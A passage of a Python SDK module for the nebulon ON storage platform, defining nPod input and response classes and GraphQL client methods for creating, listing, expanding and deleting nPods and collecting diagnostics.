self.__bond_lacp_transmit_rate\n\n @property\n def interfaces(self) -> list:\n \"\"\"List of interfaces to include in the configuration\"\"\"\n return self.__interfaces\n\n @property\n def half_duplex(self) -> bool:\n \"\"\"Allows overwriting duplex settings for the interface\"\"\"\n return self.__half_duplex\n\n @property\n def speed_mb(self) -> int:\n \"\"\"Allows overwriting interface speed\"\"\"\n return self.__speed_mb\n\n @property\n def locked_speed(self) -> bool:\n \"\"\"Allows locking interface speed\"\"\"\n return self.__locked_speed\n\n @property\n def mtu(self) -> int:\n \"\"\"Allows specifying MTU\"\"\"\n return self.__mtu\n\n @property\n def as_dict(self):\n result = dict()\n result[\"dhcp\"] = self.dhcp\n result[\"addr\"] = self.address\n result[\"netmaskBits\"] = self.netmask_bits\n result[\"gateway\"] = self.gateway\n result[\"bondModeV2\"] = self.bond_mode\n result[\"bondTransmitHashPolicy\"] = self.bond_transmit_hash_policy\n result[\"bondMIIMonitorMilliSeconds\"] = self.bond_mii_monitor_ms\n result[\"bondLACPTransmitRate\"] = self.bond_lacp_transmit_rate\n result[\"interfaces\"] = self.interfaces\n result[\"halfDuplex\"] = self.half_duplex\n result[\"speedMB\"] = self.speed_mb\n result[\"lockedSpeed\"] = self.locked_speed\n result[\"mtu\"] = self.mtu\n return result\n\n\nclass NPodSpuInput:\n \"\"\"An input object to configure SPUs for nPod creation\n\n Allows specifying SPU configuration options when creating a new nPod.\n Configuration is mostly for network settings.\n \"\"\"\n\n def __init__(\n self,\n spu_serial: str,\n spu_name: str = None,\n spu_data_ips: List[IPInfoConfigInput] = None\n ):\n \"\"\"Constructs a new NPodSpuInput object\n\n Allows specifying SPU configuration options when creating a new nPod.\n Configuration is mostly for network configuration.\n\n :param spu_serial: Specifies the SPU serial number\n :type spu_serial: str\n :param spu_name: A human readable name for the SPU\n :type spu_name: str, optional\n :param spu_data_ips: Allows configuring the SPUs network interfaces\n :type spu_data_ips: List[IPInfoConfigInput], optional\n \"\"\"\n\n self.__spu_name = spu_name\n self.__spu_serial = spu_serial\n self.__spu_data_ips = spu_data_ips\n\n if self.__spu_name is None:\n self.__spu_name = spu_serial\n\n @property\n def spu_name(self) -> str:\n \"\"\"Human readable name for a SPU. Defaults to SPU serial\"\"\"\n return self.__spu_name\n\n @property\n def spu_serial(self) -> str:\n \"\"\"Serial number for the SPU\"\"\"\n return self.__spu_serial\n\n @property\n def spu_data_ips(self) -> List[IPInfoConfigInput]:\n \"\"\"Allows configuring the SPUs network interfaces\"\"\"\n return self.__spu_data_ips\n\n @property\n def as_dict(self):\n result = dict()\n result[\"SPUName\"] = self.spu_name\n result[\"SPUSerial\"] = self.spu_serial\n result[\"SPUDataIPs\"] = self.spu_data_ips\n return result\n\n\nclass CreateNPodInput:\n \"\"\"An input object to create a new nPod\n\n A nPod is a collection of network-connected application servers with SPUs\n installed that form an application cluster. Together, the SPUs in a nPod\n serve shared or local storage to the servers in the application cluster,\n e.g. a hypervisor cluster, container platform, or clustered bare metal\n application.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n npod_group_uuid: str,\n spus: List[NPodSpuInput],\n npod_template_uuid: str,\n note: str = None,\n timezone: str = 'UTC'\n ):\n \"\"\"Constructs a new input object to create a new nPod\n\n :param name: Name of the new nPod\n :type name: str\n :param npod_group_uuid: The unique identifier of the nPod group this\n nPod will be added to\n :type npod_group_uuid: str\n :param spus: List of SPU configuration information that will be used\n in the new nPod. At least 3 SPU configuration information objects\n must be specified\n :type spus: List[NPodSpuInput]\n :param npod_template_uuid: The unique identifier of the nPod template\n to use for the new nPod\n :type npod_template_uuid: str\n :param note: An optional note for the new nPod\n :type note: str, optional\n :param timezone: The timezone to be configured for all SPUs in the nPod.\n By default the ``UTC`` timezone is used.\n :type timezone: str, optional\n \"\"\"\n\n self.__name = name\n self.__npod_group_uuid = npod_group_uuid\n self.__spus = spus\n self.__npod_template_uuid = npod_template_uuid\n self.__note = note\n self.__timezone = timezone\n\n @property\n def name(self) -> str:\n \"\"\"Name of the new nPod\"\"\"\n return self.__name\n\n @property\n def npod_group_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod group this nPod will be added to\"\"\"\n return self.__npod_group_uuid\n\n @property\n def spus(self) -> List[NPodSpuInput]:\n \"\"\"List of SPU configuration information for SPUs to use\"\"\"\n return self.__spus\n\n @property\n def npod_template_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod template to use\"\"\"\n return self.__npod_template_uuid\n\n @property\n def note(self) -> str:\n \"\"\"An optional note for the new nPod\"\"\"\n return self.__note\n\n @property\n def timezone(self) -> str:\n \"\"\"The timezone to be configured for all SPUs in the nPod\"\"\"\n return self.__timezone\n\n @property\n def as_dict(self):\n result = dict()\n result[\"nPodName\"] = self.name\n result[\"nPodGroupUUID\"] = self.npod_group_uuid\n result[\"spus\"] = self.spus\n result[\"nPodTemplateUUID\"] = self.npod_template_uuid\n result[\"note\"] = self.note\n result[\"timeZone\"] = self.timezone\n return result\n\n\nclass NPod:\n \"\"\"Defines a nebulon Pod (nPod)\n\n A nPod is a collection of network-connected application servers with SPUs\n installed that form an application cluster. Together, the SPUs in a nPod\n serve shared or local storage to the servers in the application cluster,\n e.g. a hypervisor cluster, container platform, or clustered bare metal\n application.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new nPod object\n\n This constructor expects a ``dict`` object from the nebulon ON API. It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n\n self.__uuid = read_value(\n \"uuid\", response, str, True)\n self.__name = read_value(\n \"name\", response, str, True)\n self.__note = read_value(\n \"note\", response, str, True)\n self.__npod_group_uuid = read_value(\n \"nPodGroup.uuid\", response, str, False)\n self.__volume_uuids = read_value(\n \"volumes.uuid\", response, str, False)\n self.__volume_count = read_value(\n \"volumeCount\", response, int, True)\n self.__host_uuids = read_value(\n \"hosts.uuid\", response, str, False)\n self.__host_count = read_value(\n \"hostCount\", response, int, True)\n self.__spu_serials = read_value(\n \"spus.serial\", response, str, False)\n self.__spu_count = read_value(\n \"spuCount\", response, int, True)\n self.__snapshot_uuids = read_value(\n \"snapshots.uuid\", response, str, False)\n self.__update_history = read_value(\n \"updateHistory\", response, UpdateHistory, False)\n self.__npod_template_uuid = read_value(\n \"nPodTemplate.uuid\", response, str, False)\n self.__creation_time = read_value(\n \"creationTime\", response, datetime, True)\n self.__recommended_package = read_value(\n \"recommendedPackage\", response, NPodRecommendedPackage, False)\n self.__immutable_boot_volumes = read_value(\n \"immutableBootVolumes\", response, bool, True)\n self.__immutable_boot_volumes_note = read_value(\n \"immutableBootVolumesNote\", response, str, False)\n self.__immutable_boot_volumes_snapshot_time = read_value(\n \"immutableBootVolumesSnapshotTime\", response, datetime, False)\n\n @property\n def uuid(self) -> str:\n \"\"\"The unique identifier of the nPod\"\"\"\n return self.__uuid\n\n @property\n def name(self) -> str:\n \"\"\"The name of the nPod\"\"\"\n return self.__name\n\n @property\n def note(self) -> str:\n \"\"\"An optional note for the nPod\"\"\"\n return self.__note\n\n @property\n def npod_group_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod group this nPod belongs to\"\"\"\n return self.__npod_group_uuid\n\n @property\n def volume_uuids(self) -> List[str]:\n \"\"\"List of volume identifiers defined in this nPod\"\"\"\n return self.__volume_uuids\n\n @property\n def volume_count(self) -> int:\n \"\"\"Number of volumes defined in this nPod\"\"\"\n return self.__volume_count\n\n @property\n def host_uuids(self) -> list:\n \"\"\"List of host identifiers part of this nPod\"\"\"\n return self.__host_uuids\n\n @property\n def host_count(self) -> int:\n \"\"\"Number of hosts part of this nPod\"\"\"\n return self.__host_count\n\n @property\n def spu_serials(self) -> list:\n \"\"\"List of serial numbers part of this nPod\"\"\"\n return self.__spu_serials\n\n @property\n def spu_count(self) -> int:\n \"\"\"Number of spus part of this nPod\"\"\"\n return self.__spu_count\n\n @property\n def snapshot_uuids(self) -> list:\n \"\"\"List of snapshot identifiers defined in this nPod\"\"\"\n return self.__snapshot_uuids\n\n @property\n def update_history(self) -> List[UpdateHistory]:\n \"\"\"List of updates performed on this nPod\"\"\"\n return self.__update_history\n\n @property\n def npod_template_uuid(self) -> str:\n \"\"\"Unique identifier for the nPod template used during nPod creation\"\"\"\n return self.__npod_template_uuid\n\n @property\n def creation_time(self) -> datetime:\n \"\"\"The date and time when the nPod was created\"\"\"\n return self.__creation_time\n\n @property\n def recommended_package(self) -> NPodRecommendedPackage:\n \"\"\"Unique identifier for the nPod template used during nPod creation\"\"\"\n return self.__recommended_package\n \n @property\n def immutable_boot_volumes(self) -> bool:\n \"\"\"If immmutable boot is enabled on nebulon nPod\"\"\"\n return self.__immutable_boot_volumes\n\n @property\n def immutable_boot_volumes_note(self) -> str:\n \"\"\"A note regarding immutable boot volumes\"\"\"\n return self.__immutable_boot_volumes_note\n\n @property\n def immutable_boot_volumes_snapshot_time(self) -> datetime:\n \"\"\"\n Point in time at which the immutable boot volume feature was turned on.\n \"\"\"\n return self.__immutable_boot_volumes_snapshot_time\n\n @staticmethod\n def fields():\n return [\n \"uuid\",\n \"name\",\n \"note\",\n \"nPodGroup{uuid}\",\n \"volumes{uuid}\",\n \"volumeCount\",\n \"hosts{uuid}\",\n \"hostCount\",\n \"spus{serial}\",\n \"spuCount\",\n \"snapshots{uuid}\",\n \"updateHistory{%s}\" % \",\".join(UpdateHistory.fields()),\n \"nPodTemplate{uuid}\"\n \"creationTime\",\n \"recommendedPackage{%s}\" % \",\".join(NPodRecommendedPackage.fields()),\n \"immutableBootVolumes\",\n \"immutableBootVolumesNote\",\n \"immutableBootVolumesSnapshotTime\",\n ]\n\n\nclass NPodList:\n \"\"\"Paginated nPod list object\n\n Contains a list of nPod objects and information for\n pagination. By default a single page includes a maximum of ``100`` items\n unless specified otherwise in the paginated query.\n\n Consumers should always check for the property ``more`` as per default\n the server does not return the full list of alerts but only one page.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new nPod list object\n\n This constructor expects a ``dict`` object from the nebulon ON API. It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n self.__items = read_value(\n \"items\", response, NPod, True)\n self.__more = read_value(\n \"more\", response, bool, True)\n self.__total_count = read_value(\n \"totalCount\", response, int, True)\n self.__filtered_count = read_value(\n \"filteredCount\", response, int, True)\n\n @property\n def items(self) -> list:\n \"\"\"List of nPods in the pagination list\"\"\"\n return self.__items\n\n @property\n def more(self) -> bool:\n \"\"\"Indicates if there are more items on the server\"\"\"\n return self.__more\n\n @property\n def total_count(self) -> int:\n \"\"\"The total number of items on the server\"\"\"\n return self.__total_count\n\n @property\n def filtered_count(self) -> int:\n \"\"\"The number of items on the server matching the provided filter\"\"\"\n return self.__filtered_count\n\n @staticmethod\n def fields():\n return [\n \"items{%s}\" % \",\".join(NPod.fields()),\n \"more\",\n \"totalCount\",\n \"filteredCount\",\n ]\n\n\nclass NPodCustomDiagnostic:\n \"\"\"Defines a custom diagnostics script\n\n Custom diagnostics scripts are used by nebulon customer satisfaction when\n custom commands and diagnostics scripts need to be executed on SPUs in\n customers datacenters to resolve issues.\n\n Commands cannot be executed without customer approval as they need to be\n approved and authenticated through the security triangle. Custom diagnostics\n scripts are the vehicle to facilitate the security triangle.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new NPodCustomDiagnostic object\n\n This constructor expects a ``dict`` object from the nebulon ON API. It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n self.__request_uuid = read_value(\n \"requestUID\", response, str, False)\n self.__diagnostic_name = read_value(\n \"diagnosticName\", response, str, False)\n self.__npod_uuid = read_value(\n \"podUID\", response, str, False)\n self.__once_only = read_value(\n \"onceOnly\", response, bool, False)\n self.__note = read_value(\n \"note\", response, str, False)\n\n @property\n def request_uuid(self) -> str:\n \"\"\"Unique identifier for the diagnostic script\"\"\"\n return self.__request_uuid\n\n @property\n def diagnostic_name(self) -> str:\n \"\"\"Human readable name for the diagnostic script\"\"\"\n return self.__diagnostic_name\n\n @property\n def npod_uuid(self) -> str:\n \"\"\"Unique identifier of the nPod on which the script should run\"\"\"\n return self.__npod_uuid\n\n @property\n def once_only(self) -> bool:\n \"\"\"Indicates that the script will only be executed once\"\"\"\n return self.__once_only\n\n @property\n def note(self) -> str:\n \"\"\"An optional note for the diagnostics script\"\"\"\n return self.__note\n\n @staticmethod\n def fields():\n return [\n \"requestUID\",\n \"diagnosticName\",\n \"podUID\",\n \"onceOnly\",\n \"note\",\n ]\n\n\nclass ExpectedNPodCapacity:\n \"\"\"Describes information for nPods that are about to be created\n\n Allows predicting of the storage configuration of an nPod before its\n creation.\n \"\"\"\n\n def __init__(\n self,\n response: dict\n ):\n \"\"\"Constructs a new ExpectedNPodCapacity object\n\n This constructor expects a ``dict`` object from the nebulon ON API. It\n will check the returned data against the currently implemented schema\n of the SDK.\n\n :param response: The JSON response from the server\n :type response: dict\n\n :raises ValueError: An error if illegal data is returned from the server\n \"\"\"\n self.__total_pd_capacity_blk = read_value(\n \"totalPDCapacityBlk\", response, int, False)\n self.__total_raw_capacity_blk = read_value(\n \"totalRawCapacityBlk\", response, int, False)\n self.__total_user_data_capacity_blk = read_value(\n \"totalUserDataCapacityBlk\", response, int, False)\n self.__template_saving_factor = read_value(\n \"templateSavingFactor\", response, float, False)\n self.__total_presented_capacity = read_value(\n \"totalPresentedCapacity\", response, int, False)\n self.__total_vv_count = read_value(\n \"totalVVCount\", response, int, False)\n # SPU Capacity information is omitted on purpose\n # self.__spus_capacity_info = read_value(\n # \"spusCapInfo\", response, SPUCapInfo, True)\n\n @property\n def total_pd_capacity_blk(self) -> int:\n \"\"\"Total physical drive capacity in blocks (512 bytes)\"\"\"\n return self.__total_pd_capacity_blk\n\n @property\n def total_raw_capacity_blk(self) -> int:\n \"\"\"Total raw capacity in blocks (512 bytes)\"\"\"\n return self.__total_raw_capacity_blk\n\n @property\n def total_user_data_capacity_blk(self) -> int:\n \"\"\"Total usable capacity in blocks (512 bytes)\"\"\"\n return self.__total_user_data_capacity_blk\n\n @property\n def template_saving_factor(self) -> float:\n \"\"\"Savings factor used for the calculation, provided by the template\"\"\"\n return self.__template_saving_factor\n\n @property\n def total_presented_capacity(self) -> int:\n \"\"\"Total capacity presented to hosts\"\"\"\n return self.__total_presented_capacity\n\n @property\n def total_vv_count(self) -> int:\n \"\"\"Total number of volumes that will be created\"\"\"\n return self.__total_vv_count\n\n @staticmethod\n def fields():\n return [\n \"totalPDCapacityBlk\",\n \"totalRawCapacityBlk\",\n \"totalUserDataCapacityBlk\",\n \"templateSavingFactor\",\n \"totalPresentedCapacity\",\n \"totalVVCount\",\n ]\n\nclass UpdateNPodMembersInput:\n \"\"\" An input object to update (expand) an existing nPod.\n\n The update nPod members operation is used to expand an exisitng nPod with\n the given input services processing units (SPU).\n \"\"\"\n\n def __init__(\n self,\n add_spus: List[NPodSpuInput]\n ):\n \"\"\" Constructs a new input object to update an nPod\n\n The update nPod members operation is used to expand the existing nPod\n with the given services processing units.\n\n :param add_spus: A list of input SPUs to expand the nPod.\n :type add_spus: List[NPodSpuInput]\n \"\"\"\n self.__add_spus = add_spus\n \n @property\n def add_spus(self) -> List[NPodSpuInput]:\n \"\"\"The list of SPUs to expand the nPod\"\"\"\n return self.__add_spus\n\n @property\n def as_dict(self):\n result = dict()\n result[\"addSPUs\"] = self.add_spus\n return result\n\n\nclass UpdateImmutableBootInput:\n \"\"\"Constructs a new input object to update an nPods immutable boot\"\"\"\n def __init__(\n self,\n enable: bool,\n snapshot_on_host_reboot: bool=None,\n note: str=None,\n preserve_snapshots: bool=None,\n ) -> None:\n \"\"\"\n Constructs a new input object to update an nPods immutable boot\n :param enable: Enables or disables immutable boot volumes.\n :type enable: bool\n :param note: Sets a note regarding immutable boot volumes. \n May only be specified while enabling.\n :type note: str\n :param snapshot_on_host_reboot: When enabling immutable boot volumes,\n wait until the next host reboot to actually take the snapshot. \n May only be specified while enabling. Defaults to true.\n :type snapshot_on_host_reboot: bool\n :param preserveSnapshots: When disabling immutable boot volumes, retain \n the snapshots of thier immutable image. The snapshots are now normal \n snapshots and may be deleted. May only be specified when disabling.\n :type preserveSnapshots: str\n \"\"\"\n self.__enable = enable\n self.__snapshot_on_host_reboot = snapshot_on_host_reboot\n self.__note = note\n self.__preserve_snapshots = preserve_snapshots\n\n @property\n def enable(self) -> bool:\n \"\"\"Enables or disables immutable boot volumes\"\"\"\n return self.__enable\n \n @property\n def snapshot_on_host_reboot(self) -> bool:\n \"\"\"\n When enabling immutable boot volumes, wait until the next host reboot \n to actually take the snapshot. May only be specified while enabling.\n Defaults to true.\n \"\"\"\n return self.__snapshot_on_host_reboot\n\n @property\n def note(self) -> str:\n \"\"\"Sets a note regarding immutable boot volumes. May only be specified while enabling.\"\"\"\n return self.__note\n \n @property\n def preserve_snapshots(self) -> bool:\n\n \"\"\"\n When disabling immutable boot volumes, retain the snapshots of thier\n immutable image. The snapshots are now normal snapshots and may be\n deleted. May only be specified when disabling.\n \"\"\"\n return self.__preserve_snapshots\n\n @property\n def as_dict(self):\n result = dict()\n result[\"enable\"] = self.enable\n result[\"snapshotOnHostReboot\"] = self.snapshot_on_host_reboot\n result[\"note\"] = self.note\n result[\"preserveSnapshots\"] = self.preserve_snapshots\n return result\n\n\nclass UpdateNPodTokenInput:\n \"\"\"Constructs a new input object to update an nPod\n \"\"\"\n def __init__(\n self,\n immutable_boot_volumes_input: UpdateImmutableBootInput,\n ):\n \"\"\"\n Constructs a new input object to update an nPod\n :param immutable_boot_volumes_input: Enables or disables immutable boot volumes.\n :type immutable_boot_volumes_input: UpdateImmutableBootInput\n \"\"\"\n self.__immutable_boot_volumes_input = immutable_boot_volumes_input\n\n @property\n def immutable_boot_volumes(self) -> UpdateImmutableBootInput:\n \"\"\"Enables or disables immutable boot volumes\"\"\"\n return self.__immutable_boot_volumes_input\n\n @property\n def as_dict(self):\n result = dict()\n result[\"immutableBootVolumes\"] = self.immutable_boot_volumes\n return result\n\n\nclass NPodsMixin(NebMixin):\n \"\"\"Mixin to add nPod related methods to the GraphQL client\"\"\"\n\n def get_npods(\n self,\n page: PageInput = None,\n npod_filter: NPodFilter = None,\n sort: NPodSort = None\n ) -> NPodList:\n \"\"\"Retrieve a list of provisioned nPods\n\n :param page: The requested page from the server. This is an optional\n argument and if omitted the server will default to returning the\n first page with a maximum of ``100`` items.\n :type page: PageInput, optional\n :param npod_filter: A filter object to filter the nPods on the\n server. If omitted, the server will return all objects as a\n paginated response.\n :type npod_filter: NPodFilter, optional\n :param sort: A sort definition object to sort the nPod objects\n on supported properties. If omitted objects are returned in the\n order as they were created in.\n :type sort: NPodSort, optional\n\n :returns NPodList: A paginated list of nPods.\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"page\"] = GraphQLParam(\n page, \"PageInput\", False)\n parameters[\"filter\"] = GraphQLParam(\n npod_filter, \"NPodFilter\", False)\n parameters[\"sort\"] = GraphQLParam(\n sort, \"NPodSort\", False)\n\n # make the request\n response = self._query(\n name=\"getNPods\",\n params=parameters,\n fields=NPodList.fields()\n )\n\n # convert to object\n return NPodList(response)\n\n def __get_new_pod_issues(\n self,\n spus: List[NPodSpuInput]\n ) -> Issues:\n \"\"\"Internal method that checks for issues during nPod creation\n\n :param spus: List of SPU configurations that will be used for the new\n nPod\n :type spus: List[NPodSpuInput], optional\n :returns Issues: A object describing any warnings or errors that were\n detected during nPod creation pre-flight checks.\n \"\"\"\n\n # current API expects a list of spu serial numbers\n spu_serials = [i.spu_serial for i in spus]\n\n # setup query parameters\n parameters = dict()\n parameters[\"spuSerials\"] = GraphQLParam(\n spu_serials,\n \"[String!]\",\n True\n )\n\n # make the request\n response = self._query(\n name=\"newPodIssues\",\n params=parameters,\n fields=Issues.fields()\n )\n\n # convert to object\n return Issues(response)\n\n def create_npod(\n self,\n create_npod_input: CreateNPodInput,\n ignore_warnings: bool = False,\n ) -> NPod:\n \"\"\"Allows creation of a new nPod\n\n A nPod is a collection of network-connected application servers with\n SPUs installed that form an application cluster. Together, the SPUs in\n a nPod serve shared or local storage to the servers in the application\n cluster, e.g. a hypervisor cluster, container platform, or clustered\n bare metal application.\n\n :param create_npod_input: A parameter describing the properties of the\n new nPod.\n :type create_npod_input: CreateNPodInput\n :param ignore_warnings: If specified and set to ``True`` the nPod\n creation will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the nPod creation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :returns NPod: The new nPod\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When nebulon ON reports validation errors or warnings\n and the ``ignore_warnings`` parameter is not set to ``True`` or if\n the nPod creation times out.\n \"\"\"\n\n # check for potential issues that nebulon ON predicts\n issues = self.__get_new_pod_issues(spus=create_npod_input.spus)\n issues.assert_no_issues(ignore_warnings=ignore_warnings)\n\n # setup query parameters for npod creation\n parameters = dict()\n parameters[\"input\"] = GraphQLParam(\n create_npod_input,\n \"CreateNPodInput\",\n True\n )\n\n # make the request\n mutation_name = \"createNPod\"\n response = self._mutation(\n name=mutation_name,\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n delivery_response = token_response.deliver_token()\n\n # wait for recipe completion\n self._wait_on_recipes(delivery_response, mutation_name)\n\n npod_uuid = delivery_response[\"npod_uuid_to_wait_on\"]\n npod_list = self.get_npods(\n npod_filter=NPodFilter(\n uuid=UUIDFilter(\n equals=npod_uuid\n )\n )\n )\n\n if npod_list.filtered_count != 0:\n return npod_list.items[0]\n\n return None\n\n def delete_npod(\n self,\n uuid: str,\n secure_erase: bool = False,\n ignore_warnings: bool = False,\n ):\n \"\"\"Delete an existing nPod\n\n Deletes an nPod and erases all stored data. During nPod deletion the\n configuration of SPUs in an nPod is wiped and data encryption keys are\n erased. This renders all data in the nPod unrecoverable. This operation\n is irreversible.\n\n > [!NOTE]\n > This is a non-blocking call and does not wait until the delete\n > operation is complete. SPUs may not be accessible immediately after\n > the deletion.\n\n Optionally, users can make use of the ``secure_erase`` parameter that\n will trigger a secure erase of every SSD in the nPod. This utilizes the\n manufacturer-specific software to securely delete any data on drives\n without damaging or expediting wear. Secure erase will require several\n minutes to complete.\n\n All data is encrypted before written to the backend drives and deleting\n the disk encryption key during the nPod deletion will make all data\n permanently and irreversibly unreadable. The secure erase functionality\n is only provided to support organizational processes.\n\n > [!IMPORTANT]\n > This operation will permanently erase data and the data cannot be\n > recovered. Use this method with caution.\n\n :param uuid: The unique identifier of the nPod to delete.\n :type uuid: str\n :param secure_erase: Forces a secure wipe of the nPod. While this is not\n required as nPod deletion will destroy the encryption keys and\n render data unreadable, it allows to explicitly overwrite data on\n server SSDs. Only use this flag when decommissioning storage as the\n secure_wipe procedure will take some time.\n :type secure_erase: bool, optional\n :param ignore_warnings: If specified and set to ``True`` the operation \n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When there were issues delivering the security token\n to affected SPUs.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"uid\"] = GraphQLParam(\n uuid,\n \"String\",\n True\n )\n parameters[\"secureErase\"] = GraphQLParam(\n secure_erase,\n \"Boolean\",\n False\n )\n\n # make the request\n response = self._mutation(\n name=\"delPod\",\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n # TODO: Implement recipe engine v2 that waits for SPU availability\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n token_response.deliver_token()\n\n def set_npod_timezone(\n self,\n uuid: str,\n set_npod_timezone_input: SetNPodTimeZoneInput,\n ignore_warnings: bool = False,\n ):\n \"\"\"Allows setting the timezone for all SPUs in an nPod\n\n :param uuid: The unique identifier of the nPod that is being modified.\n :type uuid: str\n :param set_npod_timezone_input: A parameter describing the timezone\n information that shall be applied to the SPUs in the nPod.\n :type set_npod_timezone_input: SetNPodTimeZoneInput\n :param ignore_warnings: If specified and set to ``True`` the operation \n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When there were issues delivering the security token\n to affected SPUs.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"uuid\"] = GraphQLParam(\n uuid, \"UUID\", True)\n parameters[\"input\"] = GraphQLParam(\n set_npod_timezone_input,\n \"SetNPodTimeZoneInput\",\n True\n )\n\n # make the request\n response = self._mutation(\n name=\"setNPodTimeZone\",\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n token_response.deliver_token()\n\n def collect_debug_info(\n self,\n debug_info_input: DebugInfoInput,\n ignore_warnings: bool = False,\n ):\n \"\"\"Allows sending verbose diagnostic information to nebulon ON\n\n In cases where more in-depth diagnostic information is required to\n resolve customer issues, this method allows capturing and uploading\n verbose diagnostic information.\n\n :param debug_info_input: A parameter that describes what information to\n collect from which infrastructure.\n :type debug_info_input: DebugInfoInput\n :param ignore_warnings: If specified and set to ``True`` the operation \n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When there were issues delivering the security token\n to affected SPUs.\n \"\"\"\n\n # setup query parameters\n parameters = dict()\n parameters[\"input\"] = GraphQLParam(\n debug_info_input,\n \"DebugInfoInput\",\n True\n )\n\n # make the request\n response = self._mutation(\n name=\"collectDebugInfo\",\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n token_response.deliver_token()\n \n def update_npod_members(\n self,\n uuid: str,\n update_npod_members_input: UpdateNPodMembersInput,\n ignore_warnings: bool = False,\n ) -> NPod:\n \"\"\" Allows expanding an existing nPod with additional SPUs\n \n The update nPod members operation is used to expand the existing nPod \n (identified by uuid) with the given services processing units (SPU) \n passed by update nPod members input.\n\n :param uuid: The unique identifier of the nPod to update.\n :type uuid: str\n :param update_npod_members_input: An input object describing the\n parameters for updating nPod\n :type update_npod_members_input: UpdateNPodMembersInput\n :param ignore_warnings: If specified and set to ``True`` the operation \n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n :returns NPod: The new nPod\n\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When nebulon ON reports validation errors or warnings\n and the ``ignore_warnings`` parameter is not set to ``True`` or if\n the update nPod members times out.\n \"\"\"\n\n # setup mutation parameters\n parameters = dict()\n parameters[\"uuid\"] = GraphQLParam(\n uuid,\n \"UUID\",\n True\n )\n parameters[\"input\"] = GraphQLParam(\n update_npod_members_input,\n \"UpdateNPodMembersInput\",\n True\n )\n\n # make the request\n mutation_name = \"updateNPodMembers\"\n response = self._mutation(\n name=mutation_name,\n params=parameters,\n fields=TokenResponse.fields()\n )\n\n # convert to object and deliver token\n token_response = TokenResponse(\n response=response,\n ignore_warnings=ignore_warnings,\n )\n delivery_response = token_response.deliver_token()\n\n # wait for recipe completion\n self._wait_on_recipes(delivery_response, mutation_name)\n\n npod_uuid = delivery_response[\"npod_uuid_to_wait_on\"]\n npod_list = self.get_npods(\n npod_filter=NPodFilter(\n uuid=UUIDFilter(\n equals=npod_uuid\n )\n )\n )\n\n if npod_list.filtered_count != 0:\n return npod_list.items[0]\n\n return None\n\n def update_npod_immutable_boot(\n self,\n uuid: str,\n immutable_boot_volumes_input: UpdateImmutableBootInput,\n ignore_warnings: bool = False,\n ) -> NPod:\n \"\"\"Parameters for updating an nPod\n :param uuid: The unique identifier of the nPod to update.\n :type uuid: str\n :param immutable_boot_volumes: Enables or disables immutable boot volumes.\n :type immutable_boot_volumes: UpdateImmutableBootInput\n :param ignore_warnings: If specified and set to ``True`` the operation \n will proceed even if nebulon ON reports warnings. It is\n advised to not ignore warnings. Consequently, the default behavior\n is that the operation will fail when nebulon ON reports\n validation errors or warnings.\n :type ignore_warnings: bool, optional\n\n\n :returns NPod: The nPod to witch the token was sent\n :raises GraphQLError: An error with the GraphQL endpoint.\n :raises Exception: When nebulon ON reports validation errors or warnings\n and the ``ignore_warnings`` parameter is not set to ``True`` or if\n the update nPod members times out.\n \"\"\"\n # setup mutation parameters\n parameters = dict()\n parameters[\"uuid\"] = GraphQLParam(\n uuid,\n \"UUID\",\n True\n )\n update_npod_token_input = UpdateNPodTokenInput(\n immutable_boot_volumes_input=immutable_boot_volumes_input\n )\n parameters[\"input\"] = GraphQLParam(\n update_npod_token_input,\n \"UpdateNPodTokenInput\",\n True\n )\n\n # make the request\n mutation_name = \"updateNPodToken\"\n response = self._mutation(\n name=mutation_name,\n params=parameters,\n 